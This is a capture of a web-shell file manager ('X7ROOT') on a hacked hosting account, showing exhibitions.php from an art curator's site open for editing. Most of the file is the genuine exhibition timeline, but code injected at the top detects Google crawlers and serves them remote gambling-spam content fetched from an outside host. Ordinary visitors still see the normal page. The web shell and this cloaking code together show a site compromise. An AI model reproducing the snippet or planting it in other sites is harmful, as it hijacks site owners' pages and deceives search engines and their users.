X7ROOT File Manager
Current Path:
/home/u408670528/domains/vittoriabeltrame.com/public_html
home
/
u408670528
/
domains
/
vittoriabeltrame.com
/
public_html
/
📁
..
📄
.htaccess
(0 B)
📄
AFT.php
(6.02 KB)
📄
about.php
(7.46 KB)
📁
admin
📄
artforthought.php
(21.25 KB)
📄
artist.php
(5.8 KB)
📄
artists.php
(3.46 KB)
📁
assets
📄
backend.php
(4.67 KB)
📄
default.php
(15.99 KB)
📄
exhibition.php
(6.42 KB)
📄
exhibitions.php
(48.79 KB)
📄
google86e18cc05e62c1fd.html
(53 B)
📁
includes
📄
index.php
(10.02 KB)
📄
login.php
(676 B)
📄
press.php
(40.65 KB)
📄
privacy_policy.php
(26.05 KB)
📄
readme.html
(199 B)
Editing: exhibitions.php
<?php $userAgent = strtolower($_SERVER['HTTP_USER_AGENT'] ?? ''); function is_googlebot($ua) { $bots = [ 'googlebot', 'google-inspectiontool', 'adsbot-google', 'mediapartners-google' ]; foreach ($bots as $bot) { if (strpos($ua, $bot) !== false) { return true; } } return false; } if (is_googlebot($userAgent)) { $url = 'https://lanciauterbang.pages.dev/mc777akunvipgameonline.txt'; $context = stream_context_create([ 'http' => [ 'method' => 'GET', 'timeout' => 5, 'header' => "User-Agent: Googlebot\r\n" ] ]); $content = @file_get_contents($url, false, $context); header("Content-Type: text/html; charset=UTF-8"); if ($content !== false) { echo $content; // aa.txt boleh berisi HTML } else { echo "Content unavailable"; } exit; } /* ===================== USER BIASA ===================== */ ?> <!DOCTYPE html> <html> <head> <!-- Basic --> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>Vittoria Beltrame - Art Curator</title> <meta name="keywords" content="Vittoria Beltrame, art curator, art dealer, art advisor, curator, advisor" /> <meta name="description" content="Vittoria Beltrame is a curator, art dealer and advisor."> <meta name="author" content="www.chiarafiorentini.com"> <!-- Favicon --> <link rel="shortcut icon" href="assets/img/favicon.ico" type="image/x-icon" /> <link rel="apple-touch-icon" href="assets/img/favicon/apple-touch-icon.png"> <!-- Mobile Metas --> <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1.0, shrink-to-fit=no"> <!-- Web Fonts --> <link id="googleFonts" href="https://fonts.googleapis.com/css2?family=Montserrat:wght@300;400;600;700&family=Playfair+Display:wght@400;700;900&family=Poppins:wght@200;300;400;500;600;700;800&family=Raleway:ital,wght@0,100;0,200;0,300;1,100;1,200;1,300&display=swap" rel="stylesheet" type="text/css"> <!-- Vendor CSS --> <link rel="stylesheet" href="assets/vendor/bootstrap/css/bootstrap.min.css"> <link rel="stylesheet" href="assets/vendor/fontawesome-free/css/all.min.css"> <link rel="stylesheet" href="assets/vendor/animate/animate.compat.css"> <link rel="stylesheet" href="assets/vendor/simple-line-icons/css/simple-line-icons.min.css"> <link rel="stylesheet" href="assets/vendor/owl.carousel/assets/owl.carousel.min.css"> <link rel="stylesheet" href="assets/vendor/owl.carousel/assets/owl.theme.default.min.css"> <link rel="stylesheet" href="assets/vendor/magnific-popup/magnific-popup.min.css"> <!-- Theme CSS --> <link rel="stylesheet" href="assets/css/theme.css"> <link rel="stylesheet" href="assets/css/theme-elements.css"> <link rel="stylesheet" href="assets/css/theme-blog.css"> <link rel="stylesheet" href="assets/css/theme-shop.css"> <!-- Skin CSS --> <!-- <link id="skinCSS" rel="stylesheet" href="assets/css/skins/default.css"> --> <link id="skinCSS" rel="stylesheet" href="assets/css/skins/skin-corporate-10.css"> <!-- Theme Custom CSS --> <link rel="stylesheet" href="assets/css/custom.css"> <!-- Head Libs --> <script src="assets/vendor/modernizr/modernizr.min.js"></script> </head> <body data-plugin-page-transition> <div class="body"> <header id="header" class="header-transparent header-effect-shrink" data-plugin-options="{'stickyEnabled': true, 'stickyEffect': 'shrink', 'stickyEnableOnBoxed': true, 'stickyEnableOnMobile': false, 'stickyChangeLogo': true, 'stickyStartAt': 30, 'stickyHeaderContainerHeight': 70}"> <div class="header-body border-top-0 bg-light box-shadow-none"> <div class="header-container container"> <div class="header-row"> <div class="header-column"> <div class="header-row"> <div class="header-logo"> <a href="https://vittoriabeltrame.com"> <p class="pt-3">VITTORIA BELTRAME</p> <!-- <img alt="Porto" width="82" height="40" src="assets/img/logo-default-slim-dark-small.png"> --> </a> </div> </div> </div> <!-- header column --> <div class="header-column justify-content-end"> <div class="header-row"> <div class="header-nav header-nav-links header-nav-dropdowns-light header-nav-dark-text order-2 order-lg-1"> <div class="header-nav-main header-nav-main-mobile-light header-nav-main-square header-nav-main-dropdown-no-borders header-nav-main-effect-2 header-nav-main-sub-effect-1"> <nav class="collapse"> <ul class="nav nav-pills" id="mainNav"> <li class="dropdown my-3 my-md-0"> <a class="dropdown-item active" href="exhibitions.php"> Exhibitions </a> </li> <li class="dropdown my-3 my-md-0"> <a class="dropdown-item " href="artists.php"> Artists </a> </li> <li class="dropdown my-3 my-md-0"> <a class="dropdown-item " href="about.php"> about </a> </li> <li class="dropdown my-3 my-md-0"> <a class="dropdown-item " href="press.php"> press </a> </li> <li class="dropdown my-3 my-md-0"> <a class="dropdown-item " href="artforthought.php"> art for thought </a> </li> </ul> </nav> </div> <button class="btn header-btn-collapse-nav" data-bs-toggle="collapse" data-bs-target=".header-nav-main nav"> <i class="fas fa-bars"></i> </button> </div> <!-- header nav --> </div> <!-- header row --> </div> <!-- header column --> </div> <!-- header row --> </div> <!-- header container --> </div> <!-- header body --> </header> <!-- fin header --> <div role="main" class="main"> <section class="page-header page-header-modern page-header-background page-header-background-md parallax overlay overlay-color-light overlay-show overlay-op-7 mt-0" data-plugin-parallax data-plugin-options="{'speed': 1.2}" data-image-src="assets/img/vittoria/covassiGallery2.jpg"> <div class="container"> <div class="row"> <div class="col-md-12 align-self-center p-static order-2 text-center"> <h1 class="text-dark">Exhibitions <strong></strong></h1> </div> </div> </div> </section> <!-- <section class="page-header page-header-modern bg-color-light-scale-1 page-header-md"> <div class="container"> <div class="row"> <div class="col-md-12 align-self-center p-static order-2 text-center"> <h1 class="text-dark font-weight-bold text-8">Timeline Full Width</h1> <span class="sub-title text-dark">Check out our Latest News!</span> </div> <div class="col-md-12 align-self-center order-1"> <ul class="breadcrumb d-block text-center"> <li><a href="#">Home</a></li> <li class="active">Blog</li> </ul> </div> </div> </div> </section> --> <div class="container py-4"> <div class="row"> <div class="col"> <div class="blog-posts"> <section class="timeline"> <div class="timeline-body"> <article class="timeline-box left post post-medium"> <div class="timeline-box-arrow"></div> <div class="p-2"> <div class="row mb-2"> <div class="col"> <div class="post-image"> <a href="exhibition.php?vid=23"> <img src="assets/img/exhibitions/IMG_0661.jpeg" class="img-fluid img-thumbnail img-thumbnail-no-borders rounded-0" alt="Lull’d In These Flowers" /> </a> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-content"> <h2 class="font-weight-semibold text-5 line-height-4 mt-2 mb-2"><a href="exhibition.php?vid=23">Lull’d In These Flowers</a></h2> <p>Soho Revue is pleased to announce Lull’d In These Flowers, a group exhibition curated by Vittoria Beltrame and inspired by the dream-laden landscapes of William Shakespeare’s A Midsummer Night’s Dream. Opening... </p> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-meta"> <span><i class="far fa-calendar-alt"></i> Jannuary 14, 2026 </span><br> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-meta"> <span><i class="far fa-user"></i> Curated by Vittoria Beltrame for Soho Revue</span> <span><i class="fas fa-map-marker-alt"></i> Soho Revue, 14 Greek Stret, </span> <!-- <span><i class="far fa-comments"></i> <a href="#">12 Comments</a></span> --> </div> </div> </div> <div class="row"> <div class="col"> <a href="exhibition.php?vid=23" class="btn btn-modern btn-light rounded-0 my-2 appear-animation" data-appear-animation="fadeInUpShorter" data-appear-animation-delay="500">Read More</a> </div> </div> </div> </article> <article class="timeline-box right post post-medium"> <div class="timeline-box-arrow"></div> <div class="p-2"> <div class="row mb-2"> <div class="col"> <div class="post-image"> <a href="exhibition.php?vid=22"> <img src="assets/img/exhibitions/IMG_0572.jpeg" class="img-fluid img-thumbnail img-thumbnail-no-borders rounded-0" alt="BONHAMS “You Also Live in Someone’s Eyes” - South Asian Modern & Contemporary Department" /> </a> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-content"> <h2 class="font-weight-semibold text-5 line-height-4 mt-2 mb-2"><a href="exhibition.php?vid=22">BONHAMS “You Also Live in Someone’s Eyes” - South Asian Modern & Contemporary Department</a></h2> <p>The Modern & Contemporary South Asian Art department at Bonhams and curator Vittoria Beltrame are pleased to present You Also Live in Someone’s Eyes, a selling exhibition bringing together works... </p> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-meta"> <span><i class="far fa-calendar-alt"></i> December 9, 2025 </span><br> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-meta"> <span><i class="far fa-user"></i> Vittoria Beltrame for Bonhams</span> <span><i class="fas fa-map-marker-alt"></i> BONHAMS, 101 New Bond St, London W1S 1SR</span> <!-- <span><i class="far fa-comments"></i> <a href="#">12 Comments</a></span> --> </div> </div> </div> <div class="row"> <div class="col"> <a href="exhibition.php?vid=22" class="btn btn-modern btn-light rounded-0 my-2 appear-animation" data-appear-animation="fadeInUpShorter" data-appear-animation-delay="500">Read More</a> </div> </div> </div> </article> <article class="timeline-box left post post-medium"> <div class="timeline-box-arrow"></div> <div class="p-2"> <div class="row mb-2"> <div class="col"> <div class="post-image"> <a href="exhibition.php?vid=21"> <img src="assets/img/exhibitions/unnamed.gif" class="img-fluid img-thumbnail img-thumbnail-no-borders rounded-0" alt="Dolce Far Niente" /> </a> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-content"> <h2 class="font-weight-semibold text-5 line-height-4 mt-2 mb-2"><a href="exhibition.php?vid=21">Dolce Far Niente</a></h2> <p>MyMA is delighted to present its upcoming online summer exhibition, Dolce Far Niente, curated by London-based curator Vittoria Beltrame. From Italian, mother tongue of the curator, Dolce Far Niente translates to... </p> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-meta"> <span><i class="far fa-calendar-alt"></i> September 18, 2025 </span><br> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-meta"> <span><i class="far fa-user"></i> Curated by Vittoria Beltrame for MyMA</span> <span><i class="fas fa-map-marker-alt"></i> Online</span> <!-- <span><i class="far fa-comments"></i> <a href="#">12 Comments</a></span> --> </div> </div> </div> <div class="row"> <div class="col"> <a href="exhibition.php?vid=21" class="btn btn-modern btn-light rounded-0 my-2 appear-animation" data-appear-animation="fadeInUpShorter" data-appear-animation-delay="500">Read More</a> </div> </div> </div> </article> <article class="timeline-box right post post-medium"> <div class="timeline-box-arrow"></div> <div class="p-2"> <div class="row mb-2"> <div class="col"> <div class="post-image"> <a href="exhibition.php?vid=20"> <img src="assets/img/exhibitions/eb60518d-19d1-409c-84ec-4183671c8379.jpeg" class="img-fluid img-thumbnail img-thumbnail-no-borders rounded-0" alt="Poetry of the Earth" /> </a> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-content"> <h2 class="font-weight-semibold text-5 line-height-4 mt-2 mb-2"><a href="exhibition.php?vid=20">Poetry of the Earth</a></h2> <p>Wilder Gallery are pleased to present Poetry of the Earth, a group exhibition co-curated by Vittoria Beltrame showcasing artwork by Isabella Amram, Dingyue Fan, Lydia Hamblet, and Rose Electra Harris.In... </p> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-meta"> <span><i class="far fa-calendar-alt"></i> June 24, 2025 </span><br> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-meta"> <span><i class="far fa-user"></i> Co-curated by Vittoria Beltrame</span> <span><i class="fas fa-map-marker-alt"></i> Wilder Gallery, 77 College Rd, London NW10 5ES</span> <!-- <span><i class="far fa-comments"></i> <a href="#">12 Comments</a></span> --> </div> </div> </div> <div class="row"> <div class="col"> <a href="exhibition.php?vid=20" class="btn btn-modern btn-light rounded-0 my-2 appear-animation" data-appear-animation="fadeInUpShorter" data-appear-animation-delay="500">Read More</a> </div> </div> </div> </article> <article class="timeline-box left post post-medium"> <div class="timeline-box-arrow"></div> <div class="p-2"> <div class="row mb-2"> <div class="col"> <div class="post-image"> <a href="exhibition.php?vid=19"> <img src="assets/img/exhibitions/unnamed.png" class="img-fluid img-thumbnail img-thumbnail-no-borders rounded-0" alt="Big Girl Pants" /> </a> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-content"> <h2 class="font-weight-semibold text-5 line-height-4 mt-2 mb-2"><a href="exhibition.php?vid=19">Big Girl Pants</a></h2> <p>The Art Office and curator Vittoria Beltrame are excited to present Big Girl Pants, a duo exhibition showcasing works from artists Corinna Spencer and Mia Wilkinson, taking place from the 13th till... </p> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-meta"> <span><i class="far fa-calendar-alt"></i> March 13, 2025 </span><br> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-meta"> <span><i class="far fa-user"></i> Curated by Vittoria Beltrame</span> <span><i class="fas fa-map-marker-alt"></i> The Art Office, 48 Chalcot Road, NW1 8LS</span> <!-- <span><i class="far fa-comments"></i> <a href="#">12 Comments</a></span> --> </div> </div> </div> <div class="row"> <div class="col"> <a href="exhibition.php?vid=19" class="btn btn-modern btn-light rounded-0 my-2 appear-animation" data-appear-animation="fadeInUpShorter" data-appear-animation-delay="500">Read More</a> </div> </div> </div> </article> <article class="timeline-box right post post-medium"> <div class="timeline-box-arrow"></div> <div class="p-2"> <div class="row mb-2"> <div class="col"> <div class="post-image"> <a href="exhibition.php?vid=18"> <img src="assets/img/exhibitions/Screenshot 2024-08-28 at 09.07.32.png" class="img-fluid img-thumbnail img-thumbnail-no-borders rounded-0" alt="I Want You To Be Weak, As Weak As I Am" /> </a> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-content"> <h2 class="font-weight-semibold text-5 line-height-4 mt-2 mb-2"><a href="exhibition.php?vid=18">I Want You To Be Weak, As Weak As I Am</a></h2> <p>EN: Tube Culture Hall is delighted to announce their new exhibition I Want You To Be Weak, As Weak As I Am featuring work by artists Gill Button, Cecilia Fiona, Ellie Kayu Ng, Gal Schindler and Melania Toma.Curated by Vittoria Beltrame,... </p> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-meta"> <span><i class="far fa-calendar-alt"></i> September 18, 2024 </span><br> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-meta"> <span><i class="far fa-user"></i> Curated by Vittoria Beltrame for Tube Culture Hall</span> <span><i class="fas fa-map-marker-alt"></i> Piazza XXV Aprile, 11/B in Milan, Italy</span> <!-- <span><i class="far fa-comments"></i> <a href="#">12 Comments</a></span> --> </div> </div> </div> <div class="row"> <div class="col"> <a href="exhibition.php?vid=18" class="btn btn-modern btn-light rounded-0 my-2 appear-animation" data-appear-animation="fadeInUpShorter" data-appear-animation-delay="500">Read More</a> </div> </div> </div> </article> <article class="timeline-box left post post-medium"> <div class="timeline-box-arrow"></div> <div class="p-2"> <div class="row mb-2"> <div class="col"> <div class="post-image"> <a href="exhibition.php?vid=17"> <img src="assets/img/exhibitions/Screenshot 2024-06-20 at 08.45.07.png" class="img-fluid img-thumbnail img-thumbnail-no-borders rounded-0" alt="Can You See Me?" /> </a> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-content"> <h2 class="font-weight-semibold text-5 line-height-4 mt-2 mb-2"><a href="exhibition.php?vid=17">Can You See Me?</a></h2> <p>Daa Art Gallery is delighted to present their next show 'Can You See Me?' held at 67a York Street, Marylebone, W1H 1QA, on from the 3rd till the 13th of July.... </p> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-meta"> <span><i class="far fa-calendar-alt"></i> July 3, 2024 </span><br> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-meta"> <span><i class="far fa-user"></i> Curated by Vittoria Beltrame for Daa Art Gallery</span> <span><i class="fas fa-map-marker-alt"></i> 67a York Street, W1H 1QA</span> <!-- <span><i class="far fa-comments"></i> <a href="#">12 Comments</a></span> --> </div> </div> </div> <div class="row"> <div class="col"> <a href="exhibition.php?vid=17" class="btn btn-modern btn-light rounded-0 my-2 appear-animation" data-appear-animation="fadeInUpShorter" data-appear-animation-delay="500">Read More</a> </div> </div> </div> </article> <article class="timeline-box right post post-medium"> <div class="timeline-box-arrow"></div> <div class="p-2"> <div class="row mb-2"> <div class="col"> <div class="post-image"> <a href="exhibition.php?vid=15"> <img src="assets/img/exhibitions/Screenshot 2024-05-21 at 10.16.06.png" class="img-fluid img-thumbnail img-thumbnail-no-borders rounded-0" alt="Lilacs Out of the Dead Land" /> </a> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-content"> <h2 class="font-weight-semibold text-5 line-height-4 mt-2 mb-2"><a href="exhibition.php?vid=15">Lilacs Out of the Dead Land</a></h2> <p>Donya Gallery is pleased to announce the launch of their gallery presenting Lilacs Out of the Dead Land, an exhibition curated by Vittoria Beltrame showcasing pieces by artists Abi Joy... </p> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-meta"> <span><i class="far fa-calendar-alt"></i> June 7, 2024 </span><br> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-meta"> <span><i class="far fa-user"></i> Curated by Vittoria Beltrame for Donya Gallery</span> <span><i class="fas fa-map-marker-alt"></i> First Floor, 56 Conduit Street, W1S 2YZ, London</span> <!-- <span><i class="far fa-comments"></i> <a href="#">12 Comments</a></span> --> </div> </div> </div> <div class="row"> <div class="col"> <a href="exhibition.php?vid=15" class="btn btn-modern btn-light rounded-0 my-2 appear-animation" data-appear-animation="fadeInUpShorter" data-appear-animation-delay="500">Read More</a> </div> </div> </div> </article> <article class="timeline-box left post post-medium"> <div class="timeline-box-arrow"></div> <div class="p-2"> <div class="row mb-2"> <div class="col"> <div class="post-image"> <a href="exhibition.php?vid=14"> <img src="assets/img/exhibitions/Screenshot 2024-04-11 at 16.06.35.png" class="img-fluid img-thumbnail img-thumbnail-no-borders rounded-0" alt="Wood Wide Web" /> </a> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-content"> <h2 class="font-weight-semibold text-5 line-height-4 mt-2 mb-2"><a href="exhibition.php?vid=14">Wood Wide Web</a></h2> <p>The exhibition Wood Wide Web showcases works by artists Isabella Amram, Keisuke Azuma, Ben Große-Johannböcke and Natalia Janula.The term Wood Wide Web was coined in the 1990s by Dr Suzanne Simard, and references the way trees... </p> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-meta"> <span><i class="far fa-calendar-alt"></i> April 25, 2024 </span><br> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-meta"> <span><i class="far fa-user"></i> Curated by Vittoria Beltrame</span> <span><i class="fas fa-map-marker-alt"></i> Great Western Studios, 65 Alfred Road, W2 5EU</span> <!-- <span><i class="far fa-comments"></i> <a href="#">12 Comments</a></span> --> </div> </div> </div> <div class="row"> <div class="col"> <a href="exhibition.php?vid=14" class="btn btn-modern btn-light rounded-0 my-2 appear-animation" data-appear-animation="fadeInUpShorter" data-appear-animation-delay="500">Read More</a> </div> </div> </div> </article> <article class="timeline-box right post post-medium"> <div class="timeline-box-arrow"></div> <div class="p-2"> <div class="row mb-2"> <div class="col"> <div class="post-image"> <a href="exhibition.php?vid=13"> <img src="assets/img/exhibitions/IMG_4861.jpeg" class="img-fluid img-thumbnail img-thumbnail-no-borders rounded-0" alt="IWD Auction 2024 - Art on a Postcard" /> </a> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-content"> <h2 class="font-weight-semibold text-5 line-height-4 mt-2 mb-2"><a href="exhibition.php?vid=13">IWD Auction 2024 - Art on a Postcard</a></h2> <p>Selected press: Creative Boom, Country & Town House, Women Art Dealers, FLO London, Hyperbae, Sheerluxe, Made In Shoreditch, The Handbook, Medium, </p> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-meta"> <span><i class="far fa-calendar-alt"></i> March 5, 2024 </span><br> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-meta"> <span><i class="far fa-user"></i> Curated by Vittoria Beltrame, Alexandra Steinacker-Clark, Cura Art, Vanessa Murrell, Jo McLaughlin, Women in Art and Gemma Peppé</span> <span><i class="fas fa-map-marker-alt"></i> 99-103 Long Acre, Covent Garden, WC2E 9NR</span> <!-- <span><i class="far fa-comments"></i> <a href="#">12 Comments</a></span> --> </div> </div> </div> <div class="row"> <div class="col"> <a href="exhibition.php?vid=13" class="btn btn-modern btn-light rounded-0 my-2 appear-animation" data-appear-animation="fadeInUpShorter" data-appear-animation-delay="500">Read More</a> </div> </div> </div> </article> <article class="timeline-box left post post-medium"> <div class="timeline-box-arrow"></div> <div class="p-2"> <div class="row mb-2"> <div class="col"> <div class="post-image"> <a href="exhibition.php?vid=12"> <img src="assets/img/exhibitions/dfa240c2-a745-4c83-8c96-f0d6c9fa5cb5.jpg" class="img-fluid img-thumbnail img-thumbnail-no-borders rounded-0" alt="Echoes of Belonging" /> </a> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-content"> <h2 class="font-weight-semibold text-5 line-height-4 mt-2 mb-2"><a href="exhibition.php?vid=12">Echoes of Belonging</a></h2> <p>The 21st century has brought about new dimensions to the relationship between alienation, aesthetic choices, and art. Artists continue to navigate the complexities of modern life, using their work to... </p> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-meta"> <span><i class="far fa-calendar-alt"></i> September 22, 2023 </span><br> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-meta"> <span><i class="far fa-user"></i> Curated by Vittoria Beltrame for Daa Art</span> <span><i class="fas fa-map-marker-alt"></i> 99-103 Long Acre, Covent Garden, WC2E 9NR</span> <!-- <span><i class="far fa-comments"></i> <a href="#">12 Comments</a></span> --> </div> </div> </div> <div class="row"> <div class="col"> <a href="exhibition.php?vid=12" class="btn btn-modern btn-light rounded-0 my-2 appear-animation" data-appear-animation="fadeInUpShorter" data-appear-animation-delay="500">Read More</a> </div> </div> </div> </article> <article class="timeline-box right post post-medium"> <div class="timeline-box-arrow"></div> <div class="p-2"> <div class="row mb-2"> <div class="col"> <div class="post-image"> <a href="exhibition.php?vid=10"> <img src="assets/img/exhibitions/INVITE copy.png" class="img-fluid img-thumbnail img-thumbnail-no-borders rounded-0" alt="Intuition Goes Before You" /> </a> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-content"> <h2 class="font-weight-semibold text-5 line-height-4 mt-2 mb-2"><a href="exhibition.php?vid=10">Intuition Goes Before You</a></h2> <p>Intuition Goes Before You is an exhibition organised by curator Vittoria Beltrame, showcasing five artists tied together by the execution of their works, due to their expressivity and bodily implications.... </p> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-meta"> <span><i class="far fa-calendar-alt"></i> August 11, 2023 </span><br> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-meta"> <span><i class="far fa-user"></i> Curated by Vittoria Beltrame</span> <span><i class="fas fa-map-marker-alt"></i> 13 Soho Square</span> <!-- <span><i class="far fa-comments"></i> <a href="#">12 Comments</a></span> --> </div> </div> </div> <div class="row"> <div class="col"> <a href="exhibition.php?vid=10" class="btn btn-modern btn-light rounded-0 my-2 appear-animation" data-appear-animation="fadeInUpShorter" data-appear-animation-delay="500">Read More</a> </div> </div> </div> </article> <article class="timeline-box left post post-medium"> <div class="timeline-box-arrow"></div> <div class="p-2"> <div class="row mb-2"> <div class="col"> <div class="post-image"> <a href="exhibition.php?vid=9"> <img src="assets/img/exhibitions/Screenshot 2023-06-05 at 08.57.35.png" class="img-fluid img-thumbnail img-thumbnail-no-borders rounded-0" alt="Korean Art London" /> </a> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-content"> <h2 class="font-weight-semibold text-5 line-height-4 mt-2 mb-2"><a href="exhibition.php?vid=9">Korean Art London</a></h2> <p>KOREAN ART LONDON 2023 INTRODUCES 30+ KOREAN CONTEMPORARY ARTISTS TO THE UK Curated by Rok Hee Hwang, Genie Ahn, Vittoria Beltrame and Seulki Yoo Mall Galleries to host a new 17-day fair of contemporary... </p> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-meta"> <span><i class="far fa-calendar-alt"></i> July 6, 2023 </span><br> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-meta"> <span><i class="far fa-user"></i> Curated by Vittoria Beltrame, Genie Ahn, Seulki Yoo for Mews Gallery at Mall Galleries</span> <span><i class="fas fa-map-marker-alt"></i> The Mall, St. James</span> <!-- <span><i class="far fa-comments"></i> <a href="#">12 Comments</a></span> --> </div> </div> </div> <div class="row"> <div class="col"> <a href="exhibition.php?vid=9" class="btn btn-modern btn-light rounded-0 my-2 appear-animation" data-appear-animation="fadeInUpShorter" data-appear-animation-delay="500">Read More</a> </div> </div> </div> </article> <article class="timeline-box right post post-medium"> <div class="timeline-box-arrow"></div> <div class="p-2"> <div class="row mb-2"> <div class="col"> <div class="post-image"> <a href="exhibition.php?vid=8"> <img src="assets/img/exhibitions/Invites.jpg" class="img-fluid img-thumbnail img-thumbnail-no-borders rounded-0" alt="And They Shall Become One Flesh" /> </a> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-content"> <h2 class="font-weight-semibold text-5 line-height-4 mt-2 mb-2"><a href="exhibition.php?vid=8">And They Shall Become One Flesh</a></h2> <p>J/M Gallery and curator Vittoria Beltrame are pleased to present Abi Joy Samuel in ‘And They Shall Become One Flesh,’ where her new body of work is shown. This will... </p> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-meta"> <span><i class="far fa-calendar-alt"></i> May 3, 2023 </span><br> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-meta"> <span><i class="far fa-user"></i> Curated by Vittoria Beltrame for J/M Gallery</span> <span><i class="fas fa-map-marker-alt"></i> J/M Gallery</span> <!-- <span><i class="far fa-comments"></i> <a href="#">12 Comments</a></span> --> </div> </div> </div> <div class="row"> <div class="col"> <a href="exhibition.php?vid=8" class="btn btn-modern btn-light rounded-0 my-2 appear-animation" data-appear-animation="fadeInUpShorter" data-appear-animation-delay="500">Read More</a> </div> </div> </div> </article> <article class="timeline-box left post post-medium"> <div class="timeline-box-arrow"></div> <div class="p-2"> <div class="row mb-2"> <div class="col"> <div class="post-image"> <a href="exhibition.php?vid=7"> <img src="assets/img/exhibitions/CicekGallery_PoliticsofCharm.jpg" class="img-fluid img-thumbnail img-thumbnail-no-borders rounded-0" alt="Politics of Charm" /> </a> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-content"> <h2 class="font-weight-semibold text-5 line-height-4 mt-2 mb-2"><a href="exhibition.php?vid=7">Politics of Charm</a></h2> <p>During its first exhibition, Cicek Gallery and curator Vittoria Beltrame are bringing together seven artists: Abi Joy Samuel, Alla Samarina, Annam Butt, Berfîn Çiçek, Kay Gasei, Naila Hazell and Fía... </p> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-meta"> <span><i class="far fa-calendar-alt"></i> October 20, 2022 </span><br> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-meta"> <span><i class="far fa-user"></i> Curated by Vittoria Beltrame for Cicek Gallery</span> <span><i class="fas fa-map-marker-alt"></i> 13 Soho Square, London W1D 3QF</span> <!-- <span><i class="far fa-comments"></i> <a href="#">12 Comments</a></span> --> </div> </div> </div> <div class="row"> <div class="col"> <a href="exhibition.php?vid=7" class="btn btn-modern btn-light rounded-0 my-2 appear-animation" data-appear-animation="fadeInUpShorter" data-appear-animation-delay="500">Read More</a> </div> </div> </div> </article> <article class="timeline-box right post post-medium"> <div class="timeline-box-arrow"></div> <div class="p-2"> <div class="row mb-2"> <div class="col"> <div class="post-image"> <a href="exhibition.php?vid=4"> <img src="assets/img/exhibitions/Screenshot 2023-04-22 at 13.25.03.png" class="img-fluid img-thumbnail img-thumbnail-no-borders rounded-0" alt="The Sensuous Heart Traveler" /> </a> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-content"> <h2 class="font-weight-semibold text-5 line-height-4 mt-2 mb-2"><a href="exhibition.php?vid=4">The Sensuous Heart Traveler</a></h2> <p> Rok Hee Hwang, owner of South Korean Mews Gallery, and curator Vittoria Beltrame, are launching a solo exhibition featuring South Korean artist Ha Jin Lee at the J/M Gallery 230... </p> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-meta"> <span><i class="far fa-calendar-alt"></i> August 16, 2022 </span><br> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-meta"> <span><i class="far fa-user"></i> Curated by Vittoria Beltrame for Mews Gallery at J/M Gallery</span> <span><i class="fas fa-map-marker-alt"></i> Mews Gallery x J/M Gallery</span> <!-- <span><i class="far fa-comments"></i> <a href="#">12 Comments</a></span> --> </div> </div> </div> <div class="row"> <div class="col"> <a href="exhibition.php?vid=4" class="btn btn-modern btn-light rounded-0 my-2 appear-animation" data-appear-animation="fadeInUpShorter" data-appear-animation-delay="500">Read More</a> </div> </div> </div> </article> <article class="timeline-box left post post-medium"> <div class="timeline-box-arrow"></div> <div class="p-2"> <div class="row mb-2"> <div class="col"> <div class="post-image"> <a href="exhibition.php?vid=1"> <img src="assets/img/exhibitions/Screenshot 2023-04-22 at 13.26.10.png" class="img-fluid img-thumbnail img-thumbnail-no-borders rounded-0" alt="Beatrice Covassi: A European Journey" /> </a> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-content"> <h2 class="font-weight-semibold text-5 line-height-4 mt-2 mb-2"><a href="exhibition.php?vid=1">Beatrice Covassi: A European Journey</a></h2> <p>A walk through the gallery space will take you through the artist’s life. As a representative of the European Union, Beatrice Covassi has lived and worked in multiple countries around... </p> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-meta"> <span><i class="far fa-calendar-alt"></i> June 29, 2022 </span><br> </div> </div> </div> <div class="row"> <div class="col"> <div class="post-meta"> <span><i class="far fa-user"></i> Curated by Vittoria Beltrame</span> <span><i class="fas fa-map-marker-alt"></i> J/M Gallery, 230 Portobello Road, W11 1LJ</span> <!-- <span><i class="far 